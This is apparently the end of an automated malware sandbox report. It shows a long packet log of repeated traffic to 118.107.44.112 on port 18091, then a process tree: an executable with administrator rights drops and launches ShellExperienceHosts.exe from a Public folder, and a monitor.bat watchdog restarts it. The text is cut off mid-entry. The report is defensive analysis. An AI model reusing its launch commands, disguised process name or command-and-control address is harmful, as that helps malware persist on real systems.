                                                                          Dec 27, 2024 09:20:47.805071115 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.805114031 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.813404083 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.813524961 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.813570976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.821832895 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.821888924 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.821970940 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.830219984 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.830348969 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.830408096 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.838597059 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.838731050 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.838778973 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.847050905 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.847161055 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.847203016 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.855423927 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.855509043 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.855554104 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.987423897 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.987581968 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.990107059 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.990221024 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.990222931 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.990267038 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.995516062 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.995637894 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.995686054 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.000931025 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.001085043 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.001132011 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.006350040 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.006519079 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.006568909 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.011769056 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.011920929 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.011970043 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.017229080 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.017371893 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.017415047 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.022622108 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.022739887 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.022778034 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.028142929 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.028207064 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.028253078 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.033499002 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.033557892 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.033601046 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.038881063 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.039035082 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.039076090 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.044333935 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.044441938 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.044481993 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.049725056 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.049763918 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.049810886 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.055159092 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.055219889 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.055260897 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.060602903 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.060719013 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.060782909 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.066016912 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.066133976 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.066184044 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.071449995 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.071635008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.071681976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.076926947 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.077076912 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.077116966 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.082288980 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.134485006 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.198378086 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.198487997 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.198529005 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.200453997 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.201164007 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.201210976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.201244116 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.205265045 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.205316067 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.205389977 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.209331036 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.209372997 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.209440947 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.213401079 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.213437080 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.213526964 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.217514992 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.217576027 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.217612982 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.221535921 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.221571922 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.221635103 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.225601912 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.225644112 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.225707054 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.229672909 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.229717016 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.229777098 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.233728886 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.233778000 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.233812094 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.237798929 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.237890005 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.237898111 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.241879940 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.241923094 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.241981030 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.246036053 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.246084929 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.246242046 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.250060081 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.250106096 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.250150919 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.254091024 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.254138947 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.254184008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.258157015 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.258222103 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.258280993 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.262221098 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.262264967 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.262348890 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.266271114 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.266319036 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.266391993 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.270368099 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.270405054 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.270486116 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.274578094 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.274625063 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.274707079 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.278520107 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.278563976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.278609037 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.282557011 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.282603025 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.282680988 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.286624908 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.286685944 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.286724091 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.290779114 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.290827036 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.290852070 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.294791937 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.294891119 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.294940948 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.298844099 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.298948050 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.298995972 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.302890062 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.302938938 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.303000927 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.306989908 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.307040930 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.307087898 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.311058998 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.311110973 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.311201096 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.353323936 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.399669886 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.399796009 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.400018930 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.401278973 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.401397943 CET1809149782118.107.44.112192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 27, 2024 09:20:48.401451111 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.409692049 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.409854889 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.409918070 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.411267042 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.411384106 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.411444902 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.414383888 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.415496111 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.415541887 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.415621042 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.418617964 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.418668985 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.418734074 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.421674013 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.421766996 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.421812057 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.424607038 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.424659014 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.424719095 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.427434921 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.427479029 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.427540064 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.430305004 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.430349112 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.430404902 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.433157921 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.433312893 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.433368921 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.435992002 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.436048985 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.436131001 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.438801050 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.438851118 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.438915014 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.441539049 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.441606045 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.441659927 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.444291115 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.444329023 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.444423914 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.447057962 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.447120905 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.447145939 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.449795008 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.449933052 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.449985981 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.452550888 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.452681065 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.452713013 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.455338001 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.455382109 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:48.455439091 CET  18091        49782      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:48.509480000 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:49.526423931 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:49.645862103 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:49.645934105 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:51.494102955 CET  49782        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:56.738759995 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:56.858417034 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:56.858443975 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:56.858544111 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:56.858553886 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:57.281172991 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:20:57.281534910 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:20:57.401140928 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:07.290869951 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:07.418960094 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:07.828175068 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:07.868889093 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:08.082544088 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:08.202162981 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:08.202176094 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:08.202187061 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:23.884603977 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:24.004281998 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:24.421958923 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:24.462696075 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:24.767067909 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:24.886954069 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:24.886969090 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:24.886996031 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:40.087758064 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:40.208798885 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:40.626523972 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:40.681457996 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:40.694967031 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:40.814749002 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:40.814765930 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:40.814779043 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:56.244400978 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:56.363899946 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:56.781737089 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:56.822113037 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:56.878858089 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:21:56.998492002 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:56.998509884 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:21:56.998526096 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:12.322333097 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:22:12.465228081 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:12.938997030 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:12.994030952 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:22:13.098416090 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:22:13.218050957 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:13.218070030 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:13.218084097 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:28.181927919 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:22:28.301928043 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:28.719065905 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:28.759680986 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:22:28.810729027 CET  49793        18091      192.168.2.4      118.107.44.112
Dec 27, 2024 09:22:28.930362940 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:28.930376053 CET  18091        49793      118.107.44.112   192.168.2.4
Dec 27, 2024 09:22:28.930449009 CET  18091        49793      118.107.44.112   192.168.2.4

Target ID: 0
Start time: 03:19:27
Start date: 27/12/2024
Path: C:\Users\user\Desktop\S1Rv3ioghk.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\S1Rv3ioghk.exe"
Imagebase: 0x400000
File size: 4'477'216 bytes
MD5 hash: FD7EC2C34E2593E4D606E0A9D37E257A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 03:19:28
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 03:19:28
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 03:19:28
Start date: 27/12/2024
Path: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\Bulete\program\ShellExperienceHosts.exe
Imagebase: 0x400000
File size: 649'416 bytes
MD5 hash: 0922B22053A6D5D9516EA910D34A4771
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 7
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
Imagebase: 0x7ff7ccaf0000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /I "ShellExperienceHosts.exe"
Imagebase: 0x5b0000
File size: 29'696 bytes
MD5 hash: F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout /t 30 /nobreak
Imagebase: 0xa50000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
